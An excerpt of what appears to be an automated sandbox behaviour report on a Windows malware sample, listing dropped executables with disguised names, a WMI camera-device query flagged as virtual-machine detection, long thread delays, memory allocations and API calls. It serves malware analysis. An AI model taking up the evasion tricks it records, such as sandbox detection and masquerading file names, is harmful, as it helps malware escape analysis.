Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Source: C:\savesbrokerCrt\driverDhcp.exe	Memory allocated: 1390000 memory reserve \| memory write watch	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Memory allocated: 1B1E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Memory allocated: 1640000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Memory allocated: 1B1B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Memory allocated: 1140000 memory reserve \| memory write watch
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Memory allocated: 1ACA0000 memory reserve \| memory write watch
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Memory allocated: 9A0000 memory reserve \| memory write watch
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Memory allocated: 1A4A0000 memory reserve \| memory write watch

Source: C:\savesbrokerCrt\driverDhcp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 3600000	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 599782	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 599282	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 599172	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 598454	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 598329	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 598193	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 597915	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 597806	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 597117	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 597016	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 596891	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 596782	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 596657	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 596438	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 596313	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 596188	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 596063	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 595719	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 595594	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 595101	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 594888	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 594782	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 594657	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 594526	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 594422	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 594175	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\savesbrokerCrt\driverDhcp.exe	Window / User API: threadDelayed 1769	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Window / User API: threadDelayed 3062	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Window / User API: threadDelayed 6610	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Window / User API: threadDelayed 367
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Window / User API: threadDelayed 367

Source: C:\savesbrokerCrt\driverDhcp.exe TID: 5548	Thread sleep count: 1769 > 30	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe TID: 6156	Thread sleep count: 244 > 30	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe TID: 984	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -3600000s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -599782s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -599657s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -599532s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -599407s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -599282s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -599172s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -598938s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -598813s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -598688s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -598563s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -598454s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -598329s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -598193s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -598078s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -597915s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -597806s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -597117s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -597016s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -596891s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -596782s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -596657s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -596547s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -596438s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -596313s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -596188s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -596063s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -595938s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -595828s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -595719s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -595594s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -595485s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -595360s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -595235s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -595101s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -595000s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -594888s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -594782s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -594657s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -594526s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -594422s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6480	Thread sleep time: -594175s >= -30000s	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 1020	Thread sleep count: 367 > 30
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe TID: 6516	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Default\Pictures\RuntimeBroker.exe TID: 2820	Thread sleep count: 367 > 30
Source: C:\Users\Default\Pictures\RuntimeBroker.exe TID: 1628	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\savesbrokerCrt\driverDhcp.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_0086A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_0086A5F4
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_0087B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_0087B8E0
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_0088AAA8 FindFirstFileExA,	0_2_0088AAA8

Source: C:\Users\user\Desktop\Mj6WEKda85.exe

Code function: 0_2_0087DD72 VirtualQuery,GetSystemInfo,

0_2_0087DD72

Source: C:\savesbrokerCrt\driverDhcp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 3600000	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 599782	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 599282	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 599172	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 598454	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 598329	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 598193	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 597915	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 597806	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 597117	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 597016	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 596891	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 596782	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 596657	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 596438	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 596313	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 596188	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 596063	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 595719	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 595594	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 595235	Jump to behavior
